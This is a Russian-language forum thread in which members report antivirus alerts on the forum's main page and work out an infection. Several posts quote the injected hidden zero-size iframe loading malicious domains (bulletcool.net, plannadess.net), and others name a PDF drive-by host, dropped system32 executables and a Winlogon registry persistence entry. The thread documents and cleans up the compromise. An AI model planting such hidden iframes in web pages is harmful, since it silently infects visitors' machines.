Ахтунг, на форуме вирус

У меня Каспер перестал ругаться сегодня... до этого тож выдавал отэту "булле-какую-то" ерунду...))) Причем ругался и в IE, и в опере...)
 
надо же... а я и не знал о таких происшествиях,- уж сколько дней захаживаю))
IE8, Symantec EP 11 x64
 
В коде на главной есть такая строка

<div class="smallfont"><iframe src=http://bulletcool.net/? width=0 height=0></iframe></div>
 
Угу, айфрейм на главной есть: <div class="smallfont"><iframe src=http://plannadess.net/? width=0 height=0></iframe></div>

При первом заходе у меня Опера ругается на отсутствующий плагин Acrobat.
 
После того, как в файле hosts забанил bulletcool.net, пару дней заходило нормально. СЕгодня снова-здорова.

С утречка попытка установить какую то хрень.
В систем32 появляется инородный екзешник: C:\WINDOWS\system32\ZK7gOVq.exe
(удалил)

Теперь прописал в hosts - plannadess.net.

Чего дальше делать будем? Ждать следующего адреска для заполнения в hosts?
 
а вообще-то...
у меня ж тут престранный случай был вчера утром.
значит, ставил я себе пианинки 4 новые... ну тут же для сравнения веса открыта была папка со старой библой АР... ну там IE8 (возможно, с RMM), pdf, word, C5, ещё несколько папок и всякая мелочь...
ставилась последняя библа, работаю в ворде, и вдруг чую: тормозец нарастает... на диспетчере в трее - норма... не понял... а на память-то глянул,- фаак!.. 98% (из 8 гб)
я в шоке, давай быстрее сохранять ворд, всё тормозит... закрываю все приложения, как во сне (когда бежишь, а ноги, как ватные)... гляжу в диспетчер: кто отжирает память? оказывается, SONAR (не путать с секвенсором, которого нету),- это превентив от Symantec Endpoint Protection 11 x64.
тут я закрываю папку со старой пианиной АР, и память падает в норму...
но не в пианине же дело... конечно, нет,- после сего происшествия (к слову, выдержанного Семёркой на ура!.. не упала) перестала работать эта самая превентивная защита... а это - трояны и прочая муть... так и написано в Симантеке: выключена, т.к. устарела,- обновите... но неоднократное обновление не помогало,- дату обновки пишет свежую, а не включает, и всё... исправлял, изменял - бесполезно... хорошо, у Симантека чёткое удаление (вчистую),- удалил, переставил, обновил,- работает:sun_bespectacled:
 
Последнее редактирование:
У меня вчера все эксплореры-файрфоксы парализовало, пока не восстановил систему позавчерашним днем. теперь работает. Ничего не качал, не устанавливал... все думал либо рммюзик, либо сайт местных мамок... похоже рммюзик
 
У меня тоже аваст заблокировал РММ, пришлось заходить через "задний крыльцо"...

Сегодня все нормально.

П.С. Браузер - лисичка.
 
завтра Крапан появится и объяснит в чём там дело

з.ы. у меня вообще никаких чёта скачать или открыть ниразу не предлогалось, правда все iframe у меня отключены.
 
Второй или третий день уже идет блокировка RMM с таким окном
2a95c34b645defc9fc5cc662db65.jpeg

Avira со свежими базами, браузер Google Chrom
 
Надо что-то решать !!! Сколько уже дней прошло ? Сколько еще ждать ? :nea:

Зачем париться еще про вирусы - когда хочешь просто зайти на форум ??? :training1:
 
У меня Лиса 3.6 и Kаспер 10-ый, ничего такого про что здесь пишут не наблюдал ни разу...
 
Три-четыре дня подряд Авира ругается, когда вхожу на Rmmedia:
1000082.png

XP SP3, Opera 10.01, Avira Antivir Personal.
 
у меня поднялся акробат и сожрал полторагига памяти по-быстрому....

ка-то это не гуд.
 
В коде страницы такой iframe:

<div class="smallfont"><iframe src=http://plannadess.net/? width=0 height=0></iframe></div>

вопрос: это нормально?
 
Вирус зачистим, нечего панику наводить, вирус не смертельный

в ближайшее время будем обновлять форум, потому что в текущем есть уязвимости через которые и был вставлен iframe код
 
нет это было связано с другим делом, сервер делал бэкап баз данных и подвис, происходит это с пятницы, сегодня обновили дальше будем смотреть
 
  • Like
Реакции: konion
вирус зачистили, просьба сообщать обо всех подобных проишествиях прямиком мне в личку или на мыло krapan гав rmmedia.ru
 
Снова при заходе на форум предлагается к загрузке PDF с сайта hттp://amutsorr.in
Но на этот раз загрузка не начинается автоматически, и до открытия Акробата дело не доходит.
 
amutsorr.in
whitehouse.gov

ребятки, юзайте Firefox в связке с no-script и ни одна левая зараза не пролезет )
 
Подтверждаю вирус сидит! Только что подцепил. Благо знаю как его убрать. Убейте пожалуйста этот вирус-для тех кто не знает как _http://forum.kaspersky.com/index.php?showtopic=157821&pid=1266297&st=0&
Вирус на заражённом компе прописывается в system32 - см. по дате(там появляется несколько exe файлов и в реестре HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon-Userinit"="c:\\windows\\system32\\userinit.exe, после строчки userinit.exe, какой-то исполнительный файл(в норм. системе после запятой ничего не должно быть) проверить можно утилитой HiJackThis
PS:На прошлой неделе убил мне два компа. AVG определял но ничего не смог сделать. Avira его вообще в упор не видит. Если-бы не 100% загрузка процесса explorer.exe и сегодна Acr.exe врядли бы так быстро разобрался.
 
на маке конечно мне не страшно, но вот сегодня залез через винду на ноутбуке с AVG и он ругнулся на главной странице, плюс GoogleChrome предлагал какой-то жизненоважный плагин, без которого сайт будет отображаться неправильно...
 
а мне предлагает загрузить и установить JAVA - отменяю и все.
 

Сейчас просматривают